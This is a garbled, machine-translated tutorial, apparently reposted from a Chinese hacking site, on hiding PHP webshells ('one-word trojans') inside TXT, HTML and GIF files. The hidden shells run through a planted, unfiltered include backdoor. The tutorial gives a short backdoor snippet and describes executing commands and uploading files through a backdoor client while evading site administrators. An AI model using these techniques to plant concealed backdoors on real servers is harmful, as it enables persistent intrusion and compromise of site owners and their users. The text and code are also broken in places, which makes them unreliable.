Hack hide php file Backdoor Tips _php Tutorial

Source: Internet
Author: User

Recently a lot of friends are asking me if I can put my that word trojan hidden into HTML or pictures, in fact, a word trojan inserted into the PHP file is already very hidden, if you want to put in HTML files or pictures, then read the test report down.

You know that if you put a PHP statement in a picture, you can't do it anyway, because PHP only resolves files with the extension PHP. So you can make the PHP statement hidden in the picture execute. We are using the call function in PHP: Include, require, and so on.

We also remember the previous days to hide the Trojan horse to the image of the article. That is, in the PHP file with the include ("X.gif") such as a statement to invoke hidden in the picture Trojan. The statements in the ASP are similar. It seems to be very covert but directly call the picture to a little bit of PHP is not difficult to find the suspect. Because it is difficult to pass parameters in the URL using get method, this makes the performance of the Trojan Horse not play.

The Include function is used more frequently in PHP, so there are too many security issues, such as PHPWIND1.36 's vulnerability because the variables behind the include are not filtered. This allows us to construct a similar statement to insert into the PHP file. Then hide the Trojan horse in the picture or HTML file, can say that the concealment is higher. As in the Phpwind forum, insert the following statement:

"?" @include includ/. $PHPWIND _root;? >

The general administrator is not able to see it.

With the include function to help us, we can hide the PHP trojan in many types of files, such as TXT, HTML, and picture files. Because TXT, HTML, and picture files are the most common of the three types of files, whether in the forum or the article system, let's do the test in turn.

First build a php file test.php file content is:

$test =$_get[test];
@include test/. $test
? >

TXT files are generally descriptive files, so we put a word trojan in the directory of the description file is OK. Arbitrarily create a TXT file t.txt. We pasted a word trojan into the T.txt file. Then visit hxxp://localhost/test/test.php?test=. /t.txt If you see the contents of T.txt to prove OK, then put in Lanker micro PHP backdoor client Trojan address added to hxxp://localhost/test/test.php?test=. The/t.txt password is added to CMD, which can be seen by executing the returned results.

For HTML files, it is generally a template file. In order to make a trojan that is inserted into the HTML file can be invoked to execute and not be displayed, we can add a text box with a hidden attribute in the HTML, such as: then use the same method as above. The returned results of the execution are generally viewable by the source file. If you use the view this program directory function. View the contents of the source file as I can get the directory for c:uniserver2_7swwwest.

Below we say the picture file, to say that the most poisonous trick is to hide the Trojan horse in the picture. We can edit a picture directly and insert it at the end of the image.

Testing generally does not affect the picture. Then the same method the client Trojan address is added into the

Our view of the PHP environment variable Returns the result is the original picture.

There may be some difference between the results of our imagination, in fact, the command has been run, but only the results can not be seen, because this is a real GIF file, so it is not to show the results returned, in order to prove whether the command is actually executed we execute the upload file command. As expected, the file has been successfully uploaded to the server. The advantage of this forgery is good concealment. The disadvantage also naturally needless to say is not echo. If you want to see the results of the return, then take out a notepad and forge a fake picture file.

http://www.bkjia.com/PHPjc/509197.html www.bkjia.com true http://www.bkjia.com/PHPjc/509197.html techarticle recently a lot of friends are asking me if I can put my that word trojan hidden into HTML or pictures, in fact, a word trojan inserted into the PHP file is already very concealed, if said obstinately to put to ...

  • Contact Us

    The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

    If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

    A Free Trial That Lets You Build Big!

    Start building with 50+ products and up to 12 months usage for Elastic Compute Service

    • Sales Support

      1 on 1 presale consultation

    • After-Sales Support

      24/7 Technical Support 6 Free Tickets per Quarter Faster Response

    • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.